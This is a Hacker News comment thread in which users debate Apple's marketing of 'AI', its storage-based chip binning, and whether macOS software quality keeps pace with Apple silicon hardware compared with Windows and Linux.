  • tempaccount420 3 hours ago

    Storage-gating is really disgusting considering how much Apple charges for storage.

    • aloer 2 hours ago

      iirc in the past it was about memory and that larger storage needs more memory for caching.

      So this made at least some sense.

      I guess yields might be good enough that they can afford to bin with another core in there as well.

      Memory is probably still the main reason for binning in the first place.

mohsen1 8 hours ago

First time seeing Apple using "AI" in their marketing material. It was "Machine Learning" and "Apple Intelligence" before...

  • mentalgear 8 hours ago

    Unfortunately, they have also succumbed to the AI hype machine. Apple, calling it by its actual name "machine learning" was about the only thing I still liked about Apple.

    • rpdillon 7 hours ago

      Wait, didn't they try to backronym their way into "Apple Intelligence" last cycle?

      https://www.apple.com/apple-intelligence/

      • kryllic 7 hours ago

        Probably don't want to draw more attention to their ongoing lawsuits [1]. Apple, for all its faults, does enjoy consistency and the unruly nature of LLM's is something I'm shocked they thought they could tame in a short amount of time. The fallout of the hilariously bad news/message "summaries" were more than enough to spook Apple from allowing that to go much further.

        >Built into your iPhone, iPad, Mac, and Apple Vision Pro* to help you write, express yourself, and get things done effortlessly.** Designed with groundbreaking privacy at every step.

        The asterisks are really icing on the cake here.

        ---

        [1] https://news.bloomberglaw.com/ip-law/apple-accused-of-ai-cop...

    • kgwgk 7 hours ago

      > actual name "machine learning"

      Yesterday’s hype is today’s humility.

    • adastra22 4 hours ago

      Machine learning is a bit more specific than what we now call AI, no?

  • vessenes 7 hours ago

    I like sniping - but I could make a product call here to support the messaging - when it's running outside diffusion models and LLMs (as per the press release) we could call that AI. Agreed that they should at least have mentioned Apple Intelligence in their PR though

  • vayup 6 hours ago

    I am sure by AI they mean Apple Intelligence:-)

  • low_tech_punk 7 hours ago

    Not all is lost: AI can still be acronym for Apple Intelligence.

toddmorey 8 hours ago

The modern Apple feels like their hardware teams way outperforming the software teams.

  • linguae 8 hours ago

    This is not the first time this has happened in Apple’s history. The transition from the 68k architecture to the PowerPC brought major performance improvements, but Apple’s software didn’t take full advantage of it. If I remember correctly, even after the PowerPC switch, core elements of the classic Mac OS still ran in emulation as late as Mac OS 9. Additionally, the classic Mac OS lacked protected memory and preemptive multitasking, leading to relatively frequent crashes. Taligent and Copland were attempts to address these issues, but they both faced development hell, culminating with the purchase of NeXT and the development of Mac OS X. But by the time Mac OS X was released, PowerPC was becoming less competitive than the x86, culminating with the Intel switch in 2006. At this point it was Apple’s software that distinguished Macs from the competition, which remained the case until the M1 Macs were released five years ago.

    • mikepurvis 8 hours ago

      Sixteen years ago, John Gruber wrote:

      > Hardware and software both matter, and Apple’s history shows that there’s a good argument to be made for developing integrated hardware and software. But if you asked me which matters more, I wouldn’t hesitate to say software. All things considered I’d much prefer a PC running Mac OS X to a Mac running Windows.

      https://daringfireball.net/2009/11/the_os_opportunity

      At the time I'd only been a Mac user for a few years and I would have strongly agreed. But definitely things have shifted— I've been back on Windows/WSL for a number of years, and it's software quality/compatibility issues that are a lot of what keeps me from trying another Mac. Certainly I'm far more tempted by the hardware experience than I am the software, and it's not even really close.

      • selectodude 8 hours ago

        That’s so wild to me - my personal laptop is still a Mac but I’m in windows all day for work. Some of the new direction of macOS isn’t awesome but the basics are still rock solid. Touchpad is perfect, sleep works 100% of the time for days on end, still has UNIX underneath.

        • pico303 7 hours ago

          Same boat, and 100% agree. I couldn’t find a single example of Windows or Windows software where I think the experience is in any way better. Windows only saving grace, as a developer, is WSL.

          For a simple example, no app remembers the last directory you were working in. The keys each app uses are completely inconsistent from app to app. And it was only in Windows 11 that Windows started remembering my window configuration when I plugged and unplugged a monitor. Then there’s the Windows 95-style dialog boxes mixed in with the Windows 11-style dialog boxes; what a UI mess. I spoke with one vendor the other day who was actually proud they’d adopted a ribbon interface in their UI “just like Office” and I verbally laughed.

          From a hardware perspective, I still don’t understand why Windows and laptop manufacturers can’t get sleep working right. My Intel MacBook Pro with an old battery still sleeps and wakes and lasts for several hours, while my new Windows laptop lasts about an hour and won’t wake from hibernate half the time without a hard reboot.

          I think Windows is the “good enough” for most people.

          • BeetleB 6 hours ago

            > I couldn’t find a single example of Windows or Windows software where I think the experience is in any way better.

            While overall I may say MacOS is better, I would not say it's better in every way.

            Believe it or not, I had a better experience with 3rd party window managers in Windows than on MacOS.

            I don't think the automation options in MacOS are better than AutoHotKey (even Linux doesn't have something as good).

            And for corporate work, the integration with Windows is much better than anything I've seen on MacOS.

            Mac HW is great. The OS is in that uncanny valley where it's UNIX, but not as good as Linux.

            • robenkleene 4 hours ago

              > I don't think the automation options in MacOS are better than AutoHotKey (even Linux doesn't have something as good).

              Did you try Keyboard Maestro https://www.keyboardmaestro.com/main/ (I've never used AutoHotKey and I'd be super curious if there are deficiencies in KM relative to it, but Keyboard Maestro is, from my perspective, a masterpiece, it's hard to imagine it being any better.)

              Also I think this statement needs a stronger defense given macOS includes Shortcuts, Automator, and AppleScript, I don't know much about Windows automation but I've never heard of them having something like AppleScript (that can say, migrate data between applications without using GUI scripting [e.g., iterate through open browser tabs and create todos from each of them operating directly on the application data rather than scripting the UI]).

              • wingworks an hour ago

                Yeah, the things that AppleScript can do is so crazy. I've fully automated keeping 1 tab in Chrome logged into a website that insists on logging me out every hour or something. (not banking or anything)

          • jpalawaga 5 hours ago

            Mac also can't get sleep right. Have you tried to make a macbook consistently be 'awake' when the lid is closed?

            You can't, really. Almost everyone resorts to buying an HDMI dongle to fake a display. Apple solved the problem at such a low level, the flexibility to run something in clamshell mode is broken, even when using caffeine/amphetamine/etc etc etc.

            So, tradeoffs. They made their laptops go to sleep very well, but broke functionality in the process. You can argue it's a good tradeoff, just acknowledge that there WAS a tradeoff made.

            • cyberpunk 4 hours ago

              Counter-Example: I ran an air without a monitor connected for years using caffeine, worked perfectly for me..

          • strbean 5 hours ago

            > And it was only in Windows 11 that Windows started remembering my window configuration when I plugged and unplugged a monitor.

            Oh god, I'm going to have to bite the bullet and switch to 11, huh?

            The one thing that has been saving me from throwing my PC out the window in rage has been the monitor I have that supports a "keep alive" mode where switching inputs is transparent to the computers connected to it. So when switching inputs between my PC and laptop neither one thinks the monitor is being disconnected/reconnected. If it wasn't for that, I'd be screaming "WHY ARE YOU MOVING ALL MY WINDOWS?" on a regular basis. (Seriously, why are you moving all my windows? Sure, if they're on the display that was just disconnected, I get you. But when I connect a new display, Windows 10 seems to throw a dart at the display space for every window and shuffle them to new locations. Windows that live in a specific place on a specific display 100% of the time just fly around for no reason. Please god just stop.)

          • prewett 5 hours ago

            > Windows only saving grace, as a developer, is WSL.

            So, Windows' saving grace is being able to run a different operating system inside it? Damning with faint praise if I ever heard it...

            • dboreham 4 hours ago

              Also the control key works.

              • simonh 3 hours ago

                Just enable space bar heating.

        • oritron 7 hours ago

          > the basics are still rock solid

          A friend of mine lost a ton of messages when upgrading the OS (and therefore Mail). A number of others were affected by the same issue. There have been show-stopper bugs in the core functionality of Photos as well. I don't get the impression that the basics are Apple's focus with respect to software.

          • simonask 7 hours ago

            It’s not as if such bugs are unheard of for Windows users, and certainly not Linux users.

            But I’ve certainly never struggled with getting WiFi to work on a Mac, or struggled with getting it to sleep/wake, or a host of other problems you routinely have on both Windows and Linux.

            It’s not even close.

            • oritron 6 hours ago

              I haven't heard about surprise-your-files-are-deleted bugs in core programs of other systems. That's a bigger show-stopper in my opinion.

              To compare Apples to apples, you'd have to look at a Framework computer and agree that wifi is going to work out of the box... but here I'm meeting you on a much weaker argument: "Apple's software basics are /not/ rock solid, but other platforms have issues too"

              • robenkleene 4 hours ago

                > I haven't heard about surprise-your-files-are-deleted bugs in core programs of other systems. That's a bigger show-stopper in my opinion.

                I don't find your original anecdote convincing:

                > A friend of mine lost a ton of messages when upgrading the OS (and therefore Mail).

                E.g., what does this mean? They lost mail messages? How did they verify they had those messages before and after? E.g., file-system operations? GUI search? How much do they know about how Mail app stores message (e.g., I used to try understand this decades ago, but I expect today messages aren't even necessarily always stored locally)? How are you syncing mail messages, e.g., using native IMAP, or whatever Gmail uses, or Exchange? What's the email backend?

                E.g. without deeper evidence this sounds more like a mail message indexing issue rather than a mail-messages-stored-on-disk-issue (in 2025, I'd personally have zero expectations about how Mail manages messages on disk, e.g., I'd expect local storage of message to be dynamically managed like most applications that aren't document-based use a combination of cloud functionality and local caching, e.g., found this in a quick search https://apple.stackexchange.com/questions/471801/ensure-maco...), but if you have stronger evidence I'd love to hear it. But as presented your extrapolating much stronger conclusions than are warranted by the anecdote in my opinion.

                • oritron 2 hours ago

                  Mail deleted a large number of messages but not all of them. It was stored in files (which were smaller on disk, so not an indexing issue) and recovery required loading snapshots from Time Machine, converting to a format Thunderbird could import and transitioning to that.

                  • robenkleene 2 hours ago

                    You've only addressed something like 30% of the issues I asked about (although I'm honestly impressed you got that far), e.g., I wouldn't call Apple Mail an application designed to managed a collection of emails on disk. Isn't the important question here whether the emails were still stored on the server? E.g., or were they using POP?

            • afandian 6 hours ago

              I've been using Mac OS since 10.3 and, whilst it's better now, I've had a memorable number of of wifi connection bugs. And ISTR issues with waking from sleep, but that might have been before the Intel migration. It's never been immune from bugs.

            • philsnow 4 hours ago

              > But I’ve certainly never struggled with getting WiFi to work on a Mac

              I want to be able to set different networking options (manual DNS, etc) for different wifi networks, but as far as I can tell, I can only set them per network interface.

              There's something like "locations" but last time I tried using that, the entire System Settings.app slowed to a crawl / beachballed until I managed to turn it back off.

              > or struggled with getting it to sleep/wake

              My m1 MBP uses something like 3-5% of its battery per hour while sleeping, because something keeps waking it up. I tried some app that is designed to help you diagnose the issue but came up empty-handed.

              ... but yes on both counts, it's light years better than my last experience with Linux, even on hardware that's supposed to have fantastic support (thinkpads).

        • eitally 6 hours ago

          I've been primarily on a Macbook for the past three years, after almost 10 years using Chromebooks as my primary machines (yay work at Google). Until 2015, I had been a rabid defender of Thinkpads (T-series, mostly), and used Windows at work and Linux (mostly Kubuntu) at home, from around 2009-2015.

          Long story short, I was very happy with the "it just works" of ChromeOS, and only let down by the lack of support for some installed apps I truly needed in my personal life. I tried a Mac back in 2015 but couldn't get used to how different it was, and it felt very bulky compared to ChromeOS and much slower than the Linux machine I'd had, so I switched to a Pixelbook as was pretty content.

          Fast forward to 2023 when I needed to purchase a new personal laptop. I'd bought my daughter a Pixelbook Go in 2021 and my son a Lenovo x1 Carbon at the same time. Windows was such a dumpster fire I absolutely ruled it out, and since I could run all the apps I needed on ChromeOS it was between Linux & Mac. I decided to try a Mac again, for both work & personal, and I've been a very happy convert ever since.

          My M2 Pro has been rock solid, and although I regret choosing to upgrade to Sequoia recently, it still makes me feel better than using Windows. M4 Pro for work is amazingly performant and I still can't get over the battery efficiency. The nicest thing, imho, is that the platform has been around long enough for a mature & vibrant ecosystem of quality-of-life utilities to exist at this point, so even little niggles (like why do I need the Scroll Reverser app at all?) are easy to deal with, and all my media editing apps are natively available.

          • TheAmazingRace an hour ago

            Sequioa is honestly a sorry sight better than Tahoe. It's only downhill from here!

        • sofixa 6 hours ago

          > sleep works 100% of the time for days on end

          In my case it works roughly ~50% of the time. Probably because of the Thunderbolt monitor connected to power it, idk.

          > the basics are still rock solid

          The basics like the OS flat out refusing to provide you any debugging information on anything going wrong? It's rock solid allright. I had an issue where occasionally I would get an error "a USB device is using too much power, try unplugging it and replugging it." Which device? Why the hell would Apple tell you that, where is the fun in that?

          Key remapping requires installing a keylogger, nor can you have a different scroll direction between mouse and touchpad. There still isn't window management which for the sizes of modern monitors is quite constraining.

          > still has UNIX underneath

          A very constrained UNIX. A couple of weeks ago I wanted to test something (pkcs11-tool signing with a software HSM), and turns out that Apple has decided that libraries can only be loaded from a number of authorised locations which can only be accessed while installing an application. You can't just use a dynamic library you're linking to, it has to be part of a wider install.

        • MichealCodes 8 hours ago

          The basics are not rock solid. Even a core feature such as remote management crashes and freezes every 5 minutes when you connect from a non-apple machine, many have reported this over years but Apple just does Apple. Safari is still atrocious when it comes to web api supports. The worst part is, with Apple, we do not know if these are intentional anti-competitive barriers or actual software bugs. I purchased a mac mini simply to compile apps via xcode and can say the core experience is MUCH more buggy than a fresh Windows or Ubuntu install.

          Edit: Hard to call intentionally preventing support for web apis a power user thing. This creates more friction for basic users trying to use any web app.

          Edit2: lol Apple PR must be all over this, went from +5 to -1 in a single refresh. Flagged for even criticizing what they intentionally break.

          • selectodude 7 hours ago

            Safari adds hours of battery life due to its hyper focus on power consumption. The level to which web API standards are affected is rather immaterial to me. I imagine we’re different consumers though.

            • MichealCodes 7 hours ago

              Adds hours of battery life to the expense of making your microphone input completely inaudible due to throttling if you background the tab it's running on.

              On iOS you cannot even keep a web app running in the background. The second they mutlitask, even with an audio/microphone active, Apple kills it. Are they truly adding battery life or are they cheating by creating restrictions that prevent apps from working?

              Being able to conduct a voice call through the browser seems like a pretty basic use case to me.

            • socalgal2 6 hours ago

              If you’re comparing to Chrome, tests show it’s no longer true

            • ahmeneeroe-v2 6 hours ago

              I am in the same boat. I prefer battery life

              • MichealCodes 6 hours ago

                Breaking things is not extending battery life. Battery life assumes functionality. Breaking functionality to extend it is a scapegoat and the break-whatever-you-want could be provided as a mode instead of one-size fits all, we don't care what breaks approach.

          • butlike 7 hours ago

            They said the basics are rock solid (to which I agree). What you're describing, I'd consider a "power user."

          • astrange 6 hours ago

            Why would you want to support web APIs? They're all just Google proposing 5000 new ways for advertisers to fingerprint you but doing it through "standards".

            • MichealCodes 5 hours ago

              Nice strawman. The core of webapis is about opening up lower level functionality from the sandbox/accessibility of the web. Beyond audio and video IO, there's great stuff coming with webgpu and webNN. Web apps are much safer and much more convenient than downloading an app, well in theory they could be if support wasn't regularly sabotaged to protect a corporate interest in walled gardens.

          • foldr 7 hours ago

            Are those basics? You don’t have to use Safari, and I’ve never used remote management over the 20 years or so that I’ve been a Mac user.

            • MichealCodes 7 hours ago

              If we dismiss remote management as a non-core feature shouldn't we consider installing a new browser to be advanced usage as well?

              I understand that this post is about MacOS, but yes, we are forced to support Safari for iOS. Many of these corporate decisions to prevent web apps from functioning properly spill over from MacOS Safari to iOS Safari.

      • KeplerBoy 8 hours ago

        I bet most people around here would prefer fully supported linux over mac os on their apple silicon.

        • vuggamie 8 hours ago

          The best part of MacOS for me is the unix tools. The command line is a real unix command line. And the rest just works. If I need a linux environment I ssh into a VPS.

          • BeetleB 6 hours ago

            > If I need a linux environment I ssh into a VPS.

            I want good window management. Linux gives me a huge number of options. MacOS - not as much.

          • ghaff 7 hours ago

            It doesn't matter for everyone/most. But, yes, having a Unix command line within MacOS is a pretty big win for some of us. Not something I use on a daily basis certainly. And I'd probably set up a Linux box (or ssh into one) if I really needed that routinely. But it's a nice bonus.

          • epistasis 7 hours ago

            Or even just containers on the Mac. Unless you need a GPU with specific hardware, or to connect to a cluster, there's ever decreasing need to use remote boxes.

          • Daneel_ 7 hours ago

            Well, kind of.. the commands on Mac OS all just a little bit different and a little bit janky. I still had to relearn all the common commands I use in order to function. I survived 6 months before I went back to a Windows/WSL combo.

            • MobiusHorizons 7 hours ago

              Notice the op said Unix not Linux. Gnu made a lot of incompatible changes from the Unix tools it was cloning. Many people in the Linux community prefer the GNU quirks (they are definitely more performance optimized for example). But if you are talking about Unix, the FreeBSD derived userland on a Mac has real Unix lineage.

            • epistasis 7 hours ago

              If you want the GNU versions of tools rather than the Mac POSIX versions, then brew can help replace your bin directory with all the GNU niceties.

              If you're talking about hardware interaction from the command line, that's very different and I don't think there's a fix.

        • pxc 8 hours ago

          Fully supported Linux + proper suspend-to-RAM are the two things I want out of Apple Silicon and may never quite get. Better online low power states are fine, but I want suspend-to-RAM and suspend-then-hibernate.

          If I close my laptop for a few days, I don't want significant battery drain. If I don't use it for two weeks, I want it to still have life left. And I don't want to write tens of gigabytes to disk every time I close the lid, either!

          • zozbot234 7 hours ago

            What happens if you enable airplane mode before closing the laptop? That should power down all radios so battery drain should be approximately equivalent to S3 standby.

          • ValdikSS 6 hours ago

            Sleep states are not trivial from the security perspective, and they've eliminated the issue by just not allowing it :)

            • astrange 3 hours ago

              It does hibernate. It just takes a long time to do it because the experience of waking up from it is bad.

        • geodel 7 hours ago

          "Fully supported by whom" is the issue and important one. Apple won't do it and going by support from "most people around here" Hector Martin et al got crumbs for years, nowhere near to support the development.

          One can just hand wave "Apple must support Linux and all" but that is not going to get anything done.

        • 7e 7 hours ago

          Linux is a vanity and the illusion is only skin-deep. The overall UX truly sucks.

          • artisin 4 hours ago

            The UX only sucks if you're unwilling to put in a minimal amount of time and effort. After that, it has no equal; it is, by definition, the opposite of vanity.

          • KeplerBoy 6 hours ago

            Which illusion? It's a computer, no more, no less and Linux is a perfectly fine interface to that computer.

          • rowanG077 5 hours ago

            I don't understand. From a pure visual standpoint OSX beats. Linux is not particularly known for looking good or cohesive. But in basically all matters it beats the pants of OSX.

        • Romario77 8 hours ago

          Linux UI is crap compared to Mac.

          It's a server or developer box first and a non-technical user second.

          • timschmidt 8 hours ago

            I've felt the opposite for more than a decade. On Linux, it's relatively easy for me to choose a set of applications which all use the same UI toolkit. Additionally, the web browser is often called "Web Browser" in the application launcher, LibreOffice Writer "Word Processor", and so on. In general there is far less branding and advertisement and more focus on function. Linux was the first OS with an "app store" (the package manager). CLI utilities available tend to be the full fat versions with all the useful options, rather than minimalist versions there to satisfy posix compatibility. I could go on.

            On Linux there is variety and choice, which some folks dislike.

            But on the Mac I get whatever Apple gives me, and that is often subject to the limitations of corporate attention spans and development budgets.

            • robenkleene 3 hours ago

              > The web browser is often called "Web Browser" in the application launcher, LibreOffice Writer "Word Processor", and so on. In general there is far less branding and advertisement and more focus on function.

              Should Emacs and Vim both be called "Editor" then?

              To me, this is actually a great example of the problems with Linux as a community, that GUI applications seem to just be treated as placeholders (e.g., all word processors are the same?), but then its inconsistent by celebrating the unique differences between editors like Vim and Emacs. Photoshop, Excel, Logic Pro, Final Cut Pro are, in my opinion, crown jewels of what we've accomplished in computing, and by extension some of the greatest creations of the human race, democratizing tasks that in some cases would have cost millions of dollars before (e.g., a recording studio in your home). Relegating these to generic names like "spreadsheet", makes them sound interchangeable, when in my opinion they're each individual creations of great beauty that should wear their names with pride. They've helped improve the trajectory of the human race by facilitating many individuals to perform actions they never would have had the resources to do otherwise.

            • MichealCodes 7 hours ago

              > limitations of corporate attention spans and development budgets

              And arbitrary turf wars like their war against web apis/apps causing more friction for devs and end users.

              • ahartmetz 4 hours ago

                I'm a Linux fan and I like that Apple isn't rubber-stamping the two new web APIs a week that Google comes up with. There are hundreds of them, most of them quite small fortunately.

          • gedy 8 hours ago

            That was maybe the case 10+ years ago but honestly have been using Fedora with Gnome on my M1, it's pretty polished and nice now.

          • markus_zhang 7 hours ago

            [flagged]

            • jll29 7 hours ago

              You are right in saying that discoverability has suffered much, by hiding scrollbar and similar changes. Also, you need to move the mouse precisely to a particular spot to re-enable the scrollbars, there is little wiggle room, which may may things harder for handicapped people, older users, or people on the move (e.g. me on a train).

              • markus_zhang 4 hours ago

                Yeah, e.g. when you have a very short scrollbar and had to guess where it is for more than 5 seconds...I'm kinda grow past that hype, nada, going back to Winux.

                It is SUCH a pity that they have extraordinary hardware (even with the price point I'd still consider it a bargin, especially for the air/mini)...

            • MichealCodes 7 hours ago

              Or just the way the menus are on apps. Some app implement their own file/edit/view menus at the top of the app, then some will use the apple version at the top of the OS. If you plug in a TV to use as a monitor and cannot adjust the aspect ratio you're forced to blindly activate these menus as they're clipped from the screen.

              MacOS folder navigation is a complete pain too, sometimes you see the list of OS folders, sometimes you see only the folder you opened in finder. If the menu is clipped due to the above aspect ratio problem, good luck getting to your home folder... No functionality to easily open a folder in terminal. Lots of basics just counter-intuitive.

              • markus_zhang 3 hours ago

                Yeah, I found it not easy to go up one level in finder. Actually I had to Google when I tried first time. The way that MacOS wants to conceal information from the users is just insane. I don't know how it is justified. Nevertheless it has a good number of ardent fans.

      • foobarian 3 hours ago

        To me it's not a MacOS vs Windows thing. It's a hardware build quality thing for sure; but even more importantly it's the integration with the OS. Now, you could say we could get a team together and integrate Windows too, but the problem is this is vastly more effective when the hardware and software are co-designed in the same house with strong feedback loops. As a result Apple's product will inevitably be better than those without such an organizational backbone.

        Quoth the Tao of Programming:

        8.4

        Hardware met Software on the road to Changtse. Software said: "You are Yin and I am Yang. If we travel together, we will become famous and earn vast sums of money." And so they set forth together, thinking to conquer the world.

        Presently, they met Firmware, who was dressed in tattered rags and hobbled along propped on a thorny stick. Firmware said to them: "The Tao lies beyond Yin and Yang. It is silent and still as a pool of water. It does not seek fame; therefore, nobody knows its presence. It does not seek fortune, for it is complete within itself. It exists beyond space and time."

        Software and Hardware, ashamed, returned to their homes.

      • qwertytyyuu 8 hours ago

        these days i'd rather have macbook running windows than macos running on standard windows laptop of the same form factor, purely for the efficiency of apple silicon.

        • floam 4 hours ago

          It wouldn’t be so power efficient anymore.

      • klooney 5 hours ago

        Advertisements in Windows seem like a deal breaker to me, but I've been gone for a while.

      • lenkite 7 hours ago

        Windows would have beat MacOS only if Microsoft had just done one small, teeny-weeny thing - just left the OS alone after Win 10.

        • xedrac 7 hours ago

          I haven't been able to stomach Windows since Vista, and I can barely stomach MacOS. Linux has spoiled me.

        • dysoco 3 hours ago

          Oh but they absolutely did beat MacOS. The amount of people who give a damn about UI polish, response times, etc. is insignificant to them.

          They got away with pushing ads, online and enterprise services, Copilot, etc. to every desktop user.

        • leptons 4 hours ago

          It depends on what you mean by "beat". Windows has a vastly larger market share than Apple ever has, or ever will.

      • lotsofpulp 7 hours ago

        Seeing my wife have to deal with BSOD and tedious restarts for Windows updates and myriad just to use Teams/Excel makes me think the software issues are far worse on the Windows side.

        Not once in 10 years have I had ti troubleshoot while she uses her personal macOS, but a Dell Latitude laptop in 2025 still can’t just “open lid, work, close lid”.

        And it’s slower. And eats more battery.

    • larodi 5 hours ago

      Curiously every big player/vendor doing something remotely relevant to GPU/NPU/APU etc. sees massive growth. Apple's M-processors are much better in terms price/value ratio for current ML pipelines. But Apple do not have server line, which then seems to be super massive problem for their products, even though their products actually compete with NVidia in the consumer market, which is very substantial position, software or not.

      AMD was also lagging with drivers, but now we see OpenAI swearing they gonna buy loads of their products, which so many people were not favor of liek just 5-7 years ago.

  • samwillis 8 hours ago

    Software is very easy to bloat, expand scope, and grow to do more than really needed, or just to release apps that are then forgotten about.

    Hardware is naturally limited in scope due to manufacturing costs, and doesn't "grow" in the same way. You replace features and components rather than constantly add to them.

    Apple needs someone to come in and aggressively cut scope in the software, removing features and products that are not needed. Pair it down to something manageable and sustainable.

    • pxc 8 hours ago

      > pare down products and features

      macOS has way too many products but far too few features. In terms of feature-completeness, it's already crippled. What OS features can macOS afford to lose?

      • coredog64 7 hours ago

        I would say it's less about losing and more about focus. Identify the lines of business you don't want to be in and sell those features to a third party who can then bundle them for $1/$10/$20. A $2T company just doesn't care, but I would bet that those excised features would be good enough for a smaller software house.

        (I have the same complaint about AWS, where a bunch of services are in KTLO and would be better served by not being inside AWS)

    • 6SixTy 5 hours ago

      macOS has like no features already, and they keep removing more.

    • panick21_ 7 hours ago

      If you think hardware can't bloat, I suggest you look into the history of Intels attempt to replace x86. Or the VAX. Not to mention tons of minicomputer companies who built ever more complex minis. And not to mention the supercomputer startup bubble.

  • geodel 8 hours ago

    Well besides software that runs in data centers/ cloud most other software is turning to crap. And people who think this crap is fine have now reached to position of responsibility at lot of companies. So things would go only worse from here.

    • sho_hn 8 hours ago

      Except community-developed open source software, which (slowly, perhaps) keeps getting better and has high resistance to enshittification.

      • geodel 8 hours ago

        The OSS that keeps getting "better" is one that accept lot user feature requests and/or implementation. Else maintainers are hostile to users. And when they do accept most of those requests and code we all know how it goes.

      • Noaidi 8 hours ago

        This right here is moving me back to GrapheneOS and Linux. I was lucky enough to be able to uninstall Liquid glAss before the embargo. I will miss the power efficiency of my M1, but the trade off keep looking better and better.

        being poor, I need to sell my Macbook to get money to pay of my 16e, then sell the 16e and use that money to but a Pixel 9, then probably a but a Thinkpad Carbon X1. Just saying all that to show you the lengths I am going through to boycott/battle the enshitification.

        • pbronez 8 hours ago

          If you already have an M1 MacBook, why no run Asahi Linux?

          • Noaidi 7 hours ago

            Is it functional yet? Last I looked at it was about a year ago. Do you have any real use experience of it?

            • kroaton 37 minutes ago

              Look higher up in the thread, someone did a full breakdown.

      • Aperocky 8 hours ago

        Remember log4j? I don't share your enthusiasm.

        At least its open source and free I guess.

        • jacquesm 7 hours ago

          What is your point even? That open source has bugs? The closed source does not have such bugs?

          • Aperocky 7 hours ago

            You won't have that bug if the logger isn't trying to talk to some ldap server.

            It's not even about open source or closed source at this point. It's about feature creep.

            • bzzzt 7 hours ago

              It's not talking to an LDAP server, it's the functionality for talking to an LDAP server that is causing the issue. Even if you don't need LDAP you're still vulnerable when a client can inject information in a log message.

              • Aperocky 2 hours ago

                Why is this functionality needed in the first place? I want to write log, some kind of string, into some kind of files, with rotation, maybe even send it somewhere that expect logs.

                Why parse whatever is in the logs, at all?

                Imagine the same stuff in your SSH client, it would parse the content before sending them over because a functionality requires it to talk to some server somewhere, it's insanity.

                • bzzzt an hour ago

                  Log4j contains a very big collection of extensions for just about anything including inserting data from various sources. Of course it's overkill for lots of situation, but nobody ever uses all functionality. It's just that nobody can agree on which functionality is useless ;)

          • geodel 7 hours ago

            Indeed a software used by thousands of commercial products and millions of enterprise applications with ZERO dollar support from either must be maintained at perfect, bug free level by lazy volunteers. Because internet demands it.

            • bzzzt 7 hours ago

              Would it even be possible to create today's software ecosystems by mandating all libraries are maintained and supported to the strictest standards?

              That would be the end of open source, hobbyists and startup companies because you'd have to pay up just to have a basic C library (or hope some companies would have reasonable licensing and support fees).

              Remember one of the first GNU projects was GCC because a compiler was an expensive, optional piece of software on the UNIX systems in those days.

              • jacquesm 6 hours ago

                That would be the end of the software industry. No company outside of aerospace and medical devices is capable of delivering this and I even have my doubts about those two, though at least they are trying.

        • usefulcat 8 hours ago

          That was a bug, not at all the same thing as enshittification.

          • Aperocky 7 hours ago

            It was enshittification. A logging framework that looks up LDAP servers? Why?

            Adding extra features that aren't necessarily needed is enshittification, and very not-unix.

            • bzzzt 7 hours ago

              It's not really added functionality, more unintended consequences of too much flexibility. Java contains JNDI (Java naming & directory interface), a very unified 'directory' system for all kinds of configuration of which LDAP is just one of the backend implementation options. The key issue is you can call into other objects which is unwise to do when used with untrusted user input.

              • Aperocky 2 hours ago

                > The key issue is you can call into other objects which is unwise to do when used with untrusted user input.

                This, and while in this case it is specifically unwise on security terms, there are plenty of other example where the feature are completely cosmetic and deviates from the core user requirements/scenario.

  • SCdF 7 hours ago

    I don't think it's the modern Apple, I think that's just Apple.

    I remember using iTunes when fixing the name of an album was a modal blocking function that had to write to each and every MP3, one by one, in the slowest write I have ever experienced in updating file metadata. Give me a magnetised needle and a steady hand and I could have done it faster.

    A long time ago they had some pretty cool design guides, and the visual design has often been nice, but other than that I don't think their software has been notable for its quality.

    • robenkleene 4 hours ago

      Apple makes Logic Pro, Final Cut Pro, Notes, Calendar, Contacts, Pages, Numbers, Keynote, Freeform, just from a "quality" standpoint, I'd rank any of those applications as competitive for the "highest quality" app in their category (an admittedly difficult thing to measure). In aggregate, those applications would make Apple the most effective company in the world at making high-quality GUI applications.

      Curious if I'm missing something though, is there another entity with a stronger suite than that? Or some other angle to look at this? (E.g., it seems silly to me to use an MP3 metadata example when you're talking about the same company that makes Logic Pro.)

      • SCdF 2 hours ago

        Of those apps you've listed that I've used, none of them have been notable for being high quality to me, though as you say it's difficult to measure. For me I would rate them somewhere between unremarkable (notes, calendar, contacts!?) and awkward (pages, numbers, keynote). If you asked me to guess what desktop software Apple makes that people rate highly, I never would have guessed any of those, except _maybe_ Logic[1] and Final Cut, though ironically those are two of the three I've never used.

        I also think you're confusing what I wrote. It's not a competition.

        I have just found that Apple's hardware on desktop has been stronger than their software, in my experience (periodic sporadic use, ~2006->now).

        [1] and now from a sibling comment I hear that perhaps people regard that tool as bad, so there you go, they jury is clearly out

        • robenkleene 2 hours ago

          What software do you find to be higher quality and why? That's the only valid way of even trying to have this conversation.

          E.g., I'd rank something like VS Code "lower quality" because when I launch VS Code, I can see each layer of the UI pop in as it's created, e.g., first I see a blank window, then I see window chrome being loaded, then a I see a row of icons being loaded on the left. This gives an impression of the software not being solid, because it feels like the application is struggling just to display the UI.

          > I also think you're confusing what I wrote. It's not a competition.

          > I have just found that Apple's hardware on desktop has been stronger than their software, in my experience (periodic sporadic use, ~2006->now).

          I disagree with this, the only way to make an argument that Apple has deficiencies in their software is to demonstrate that other software is higher quality than Apples. Otherwise it could just be Apple's quality level is the maximum feasible level of quality.

          > unremarkable (notes, calendar, contacts!?) and awkward (pages, numbers, keynote).

          This is laughable, Notes is unremarkable? Give me a break, and Keynote is awkward? Have you ever Google'd how people feel about these applications?

          I'd argue a critic only has value if they're willing to offer their own taste for judgement.

      • bigyabai 2 hours ago

        Do you regularly use the alternatives to these programs? Admittedly I'm not cut out to judge the office suite, but the consensus in the music world seems to be that Logic Pro is awful. It lacks support for lots of plugins and hardware, and costs loads for what is essentially a weaker value prop than Bitwig or Ableton Live. Most bedroom musicians are using Garageband or other cheap DAWs like Live Lite, and the professional studios are all bought into Pro Tools or Audition. Don't even get me started on the number of pros I see willingly use Xcode...

        It's not exactly clear to me what niche Apple occupies in this market. It doesn't feel like "native Mac UI" is a must-have feature for DAWs or IDEs alike, but maybe that's just my perspective.

        • robenkleene 2 hours ago

          Yes, I use Ableton Live every day.

          > It lacks support for lots of plugins and hardware, and costs loads for what is essentially a weaker value prop than Bitwig or Ableton Live.

